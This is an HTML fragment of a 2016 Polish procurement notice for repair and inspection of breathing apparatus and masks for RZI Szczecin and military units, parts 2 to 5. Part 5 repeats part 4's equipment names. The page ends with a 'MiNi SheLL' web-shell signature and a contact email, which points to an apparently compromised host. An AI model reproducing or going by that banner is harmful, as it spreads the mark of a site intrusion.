<li>1. Cena - 90</li>
<li>2. Okres gwarancji (przedłużenie) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Naprawa i konserwacja aparatów powietrznych i masek do aparatów powietrznych typu BD-96 Compact / AUER..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na wykonaniu napraw, konserwacji i przeglądów aparatów powietrznych  oraz masek do aparatów powietrznych.
                            Część II - Naprawa i konserwacja aparatów powietrznych i masek do aparatów powietrznych typu
                  BD-96 Compact / AUER

2.	Opis przedmiotu zamówienia został szczegółowo określony w Zestawieniu przedmiotu zamówienia - specyfikacja techniczna stanowiącym załącznik nr 4.2  do SIWZ - dla części II zamówienia
3.	Przedmiot zamówienia objęty częścią II zamówienia (naprawy) Wykonawca zobowiązuje się wykonywać w swojej siedzibie. Koszty transportu pokrywa Wykonawca. Odbioru przedmiotu zamówienia w celu wykonania naprawy Wykonawca dokona w RZI Szczecin przy ul. Ostrawickiej 16 w Szczecinie. Odbioru przedmiotu zamówienia po wykonaniu usługi dokona w swojej siedzibie wyznaczona przez Zamawiającego komisja, dokonując spisania protokołu odbioru, który będzie podstawą wystawienia faktury. Wykonawca zobowiązany jest dokonać wpisu w książkach paszportowych aparatów powietrznych i książkach przeglądów masek.
4.	Termin wykonywania zamówienia dla części II -   31 dni od dnia 01.08.2016 r. 
5.	Wartość szacunkowa II części zamówienia: 24 600,00 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 31.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji (przedłużenie) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przegląd aparatów powietrznych i masek typu AERIS/FENZY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na wykonaniu napraw, konserwacji i przeglądów aparatów powietrznych  oraz masek do aparatów powietrznych.
                            Część III - Przegląd aparatów powietrznych i masek typu AERIS/FENZY 

2.	Opis przedmiotu zamówienia został szczegółowo określony w Zestawieniu przedmiotu zamówienia - specyfikacja techniczna stanowiącym załącznik nr 4.3  do SIWZ - dla części III zamówienia
3.	Przedmiot zamówienia objęty częścią III zamówienia (przeglądy) Wykonawca zobowiązuje się wykonywać w siedzibach Zamawiającego. Miejscowości oraz adresy wykonywania usług określone zostały w zał. nr 6 do SIWZ - Wykaz Wojskowych Oddziałów Gospodarczych i Jednostek Wojskowych oraz osób uprawnionych w imieniu Zamawiającego do odbioru usługi. Koszty związane z dojazdem do miejscowości, w których będą wykonywane przeglądy pokrywa Wykonawca.
Zamawiający najpóźniej na 14 dni przed końcowym terminem realizacji usług określonym w załączniku- Terminy przeglądów aparatów powietrznych, nr 5.1  do SIWZ - dla części III zamówienia, powiadomi pismem (fax) Wykonawcę o możliwości przystąpienia do realizacji zamówienia (usługi). 
Wykonawca na 2 dni przed każdą planowaną usługą zobowiązany jest przesłać do odbiorcy docelowego usługi pismo, fax  potwierdzające gotowość realizacji usługi z jednoczesnym wskazaniem dokładnego terminu jej wykonania, osób (imię, nazwisko), które wezmą udział w realizacji zamówienia oraz rodzaju pojazdu (marka, typ, numer rejestracyjny).
4.	Termin wykonywania zamówienia dla części III -  90 dni od dnia 01.07.2016 r., zgodnie z określonymi w zał. nr 5.1 do SIWZ terminami przeglądów.
5.	Wartość szacunkowa III części zamówienia: 15 248,00 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin gotowości do realiz. usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przegląd aparatów powietrznych i masek typu BD-96 COMPACT, AIRGO FIX / AUER..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na wykonaniu napraw, konserwacji i przeglądów aparatów powietrznych  oraz masek do aparatów powietrznych.
                            Część IV - Przegląd aparatów powietrznych i masek typu BD-96 COMPACT, AIRGO FIX /
                                              AUER FENZY 
2.	Opis przedmiotu zamówienia został szczegółowo określony w Zestawieniu przedmiotu zamówienia - specyfikacja techniczna stanowiącym załącznik nr 4.4  do SIWZ - dla części IV zamówienia
3.	Przedmiot zamówienia objęty częścią IV zamówienia (przeglądy) Wykonawca zobowiązuje się wykonywać w siedzibach Zamawiającego. Miejscowości oraz adresy wykonywania usług określone zostały w zał. nr 6 do SIWZ - Wykaz Wojskowych Oddziałów Gospodarczych i Jednostek Wojskowych oraz osób uprawnionych w imieniu Zamawiającego do odbioru usługi. Koszty związane z dojazdem do miejscowości, w których będą wykonywane przeglądy pokrywa Wykonawca.
Zamawiający najpóźniej na 14 dni przed końcowym terminem realizacji usług określonym w załączniku- Terminy przeglądów aparatów powietrznych, nr 5.2  do SIWZ - dla części IV zamówienia, powiadomi pismem (fax) Wykonawcę o możliwości przystąpienia do realizacji zamówienia (usługi). 
Wykonawca na 2 dni przed każdą planowaną usługą zobowiązany jest przesłać do odbiorcy docelowego usługi pismo, fax  potwierdzające gotowość realizacji usługi z jednoczesnym wskazaniem dokładnego terminu jej wykonania, osób (imię, nazwisko), które wezmą udział w realizacji zamówienia oraz rodzaju pojazdu (marka, typ, numer rejestracyjny).
4.	Termin wykonywania zamówienia dla części IV -  30 dni od dnia 01.09.2016 r., zgodnie z określonymi w zał. 5.2 do SIWZ terminami przeglądów
5.	Wartość szacunkowa IV części zamówienia: 35 657,00 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin gotowosci do realiz. usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przegląd aparatów powietrznych i masek typu PSS 5000..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na wykonaniu napraw, konserwacji i przeglądów aparatów powietrznych  oraz masek do aparatów powietrznych.
                            Część V - Przegląd aparatów powietrznych i masek typu BD-96 COMPACT, AIRGO FIX /
                                              AUER FENZY .
2.	Opis przedmiotu zamówienia został szczegółowo określony w Zestawieniu przedmiotu zamówienia - specyfikacja techniczna stanowiącym załącznik nr 4.5  do SIWZ - dla części V zamówienia
3.	Przedmiot zamówienia objęty częścią V zamówienia (przeglądy) Wykonawca zobowiązuje się wykonywać w siedzibach Zamawiającego. Miejscowości oraz adresy wykonywania usług określone zostały w zał. nr 6 do SIWZ - Wykaz Wojskowych Oddziałów Gospodarczych i Jednostek Wojskowych oraz osób uprawnionych w imieniu Zamawiającego do odbioru usługi. Koszty związane z dojazdem do miejscowości, w których będą wykonywane przeglądy pokrywa Wykonawca.
Zamawiający najpóźniej na 14 dni przed końcowym terminem realizacji usług określonym w załączniku- Terminy przeglądów aparatów powietrznych, nr 5.3  do SIWZ - dla części V zamówienia, powiadomi pismem (fax) Wykonawcę o możliwości przystąpienia do realizacji zamówienia (usługi). 
Wykonawca na 2 dni przed każdą planowaną usługą zobowiązany jest przesłać do odbiorcy docelowego usługi pismo, fax  potwierdzające gotowość realizacji usługi z jednoczesnym wskazaniem dokładnego terminu jej wykonania, osób (imię, nazwisko), które wezmą udział w realizacji zamówienia oraz rodzaju pojazdu (marka, typ, numer rejestracyjny).
4.	Termin wykonywania zamówienia dla części V -  30 dni od dnia 01.09.2016 r., zgodnie z określonymi w zał. 5.3 do SIWZ terminami przeglądów.
5.	Wartość szacunkowa IV części zamówienia: 4 800,00 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin gotowosci do realiz. usługi - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com